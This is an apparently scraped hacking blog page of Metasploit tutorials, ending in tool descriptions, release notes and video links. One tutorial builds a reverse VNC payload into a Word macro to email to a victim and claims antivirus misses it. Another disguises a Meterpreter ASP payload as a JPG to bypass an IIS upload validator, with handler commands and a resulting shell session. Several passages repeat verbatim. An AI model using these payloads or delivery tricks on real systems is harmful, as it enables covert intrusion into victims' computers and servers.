Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user
Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect It,
there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router
Lets begin
1) Create a Macro to Intergate with word
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas
2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system
3)now in Backtrack type this command
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E
When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
Video link for the above guide
http://blip.tv/file/1847504
http://wirelesspunter.blip.tv
Tuesday, January 5, 2010
Monday, January 4, 2010
Exploiting Microsoft IIS with Metasploit
First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:
$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp
Now we need to configure msfconsole to accept the incoming connection:
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j
To avoid the image content validator, we will prepend a valid JPG image to our ASP script:
$ cat happy.jpg evil.asp > "evil.asp;.jpg"
$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02
Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"
Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
Metasploit Blog
$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp
Now we need to configure msfconsole to accept the incoming connection:
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j
To avoid the image content validator, we will prepend a valid JPG image to our ASP script:
$ cat happy.jpg evil.asp > "evil.asp;.jpg"
$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02
Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"
Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
Metasploit Blog
Metasploit? What is it?
What is it?
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
What does it do?
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
What does it do?
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.
Metasploit 3.3 Released
Version 3.3.3 of the Metasploit Framework has been released, featuring exploit safety rankings, a smaller EXE template, the addition of the InitialAutoRunScript option for Meterpreter, and the ability to run a script or command on all open sessions (sessions -c/-s). The complete release notes are online and version 3.3.3 can obtained from this download page
The Metasploit Framework
The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task. Metasploit is written in the Ruby scripting language and is provided under the BSD license. More information about the framework can be found on the Framework site.
The latest downloads for the Metasploit Framework can be found on the Downloads page.
The development source of the Metasploit Framework can be retrieved from Subversion with the following command:
Please see the Installation and Updating pages for help installing the framework.
New users may be interested in the Feature Guide
The Wiki index may be a good starting point
The latest downloads for the Metasploit Framework can be found on the Downloads page.
The development source of the Metasploit Framework can be retrieved from Subversion with the following command:
$ svn co https://www.metasploit.com/svn/framework3/trunk/Please see the Installation and Updating pages for help installing the framework.
New users may be interested in the Feature Guide
The Wiki index may be a good starting point
Hacking Malware [Video Tut]
http://good.net/dl/bd/defcon-14-video/Defcon14-V12-Valsmith_and_Quist-Hacking_Malware.mp4/infoHD Video
"Hacking Malware"
